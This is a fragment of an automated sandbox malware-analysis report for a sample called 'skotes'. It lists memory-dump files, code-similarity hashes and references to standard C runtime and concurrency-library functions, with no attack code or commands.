                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1423051803-0
                                                                                                                                                                                                                                              • Opcode ID: 5d7f92eb5cb744e111fee8db88dde66a011830216a76d59037eedd0849c20c9b
                                                                                                                                                                                                                                              • Instruction ID: 4a890a03ea529d1672c231481234823c634ab1f3a6644c4d6d3f7febf7d3a268
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d7f92eb5cb744e111fee8db88dde66a011830216a76d59037eedd0849c20c9b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E251E572600206AFDF29AF65EC41EFB37A9DF82764F150269FD1497180EB30DD90B6A0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 00BFE91E
                                                                                                                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00BFE926
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BFE950
                                                                                                                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00BFE959
                                                                                                                                                                                                                                              • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00BFE9DC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 512098550-0
                                                                                                                                                                                                                                              • Opcode ID: c6db6726a33a4e0c7065001f4f50f520799d950809c18a23ba4e4f5504f528e6
                                                                                                                                                                                                                                              • Instruction ID: 4fcfca873c3e517cfb690e37cd9747c97c5dd2ea442e4820319a19ab3dee4258
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6db6726a33a4e0c7065001f4f50f520799d950809c18a23ba4e4f5504f528e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08415E35A00219EFCB09DF64C454A7DB7F6FF88310F14819AE516A77A1CB74AE05CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00BFD344
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFD367
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00BFD370
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFD3A8
                                                                                                                                                                                                                                              • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00BFD3B3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4212520697-0
                                                                                                                                                                                                                                              • Opcode ID: 6dd1d60dac46bf475b742bbfb3948956aef34cbad96a9e4bcd08f08e1bc40fe5
                                                                                                                                                                                                                                              • Instruction ID: 952b37a8c36b197f88fc36d0fa924cc0592e55e01e8ffcf9f8a664f031cb8882
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dd1d60dac46bf475b742bbfb3948956aef34cbad96a9e4bcd08f08e1bc40fe5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E31AE75700218AFCB15DB54C885BBDB7E6EF88300F1541D9EA069B392CB70AD49CB92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _SpinWait.LIBCONCRT ref: 00BF86EE
                                                                                                                                                                                                                                                • Part of subcall function 00BEEAD0: _SpinWait.LIBCONCRT ref: 00BEEAE8
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00BF8702
                                                                                                                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00BF8734
                                                                                                                                                                                                                                              • List.LIBCMT ref: 00BF87B7
                                                                                                                                                                                                                                              • List.LIBCMT ref: 00BF87C6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3281396844-0
                                                                                                                                                                                                                                              • Opcode ID: aeeb031c7d256fb662b30992c469bd808281a18879bca96d0743a3214a301c97
                                                                                                                                                                                                                                              • Instruction ID: 4501c2b2b965feaee3dad6283a9e713b4e74811f8f245bc51a4518bc74395bf1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aeeb031c7d256fb662b30992c469bd808281a18879bca96d0743a3214a301c97
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB31463690169ADFCB14EFA4D5816FDB7F1BF04718F2400AAD6417B652CB31AD08CB95
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C018A4
                                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00C018EB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
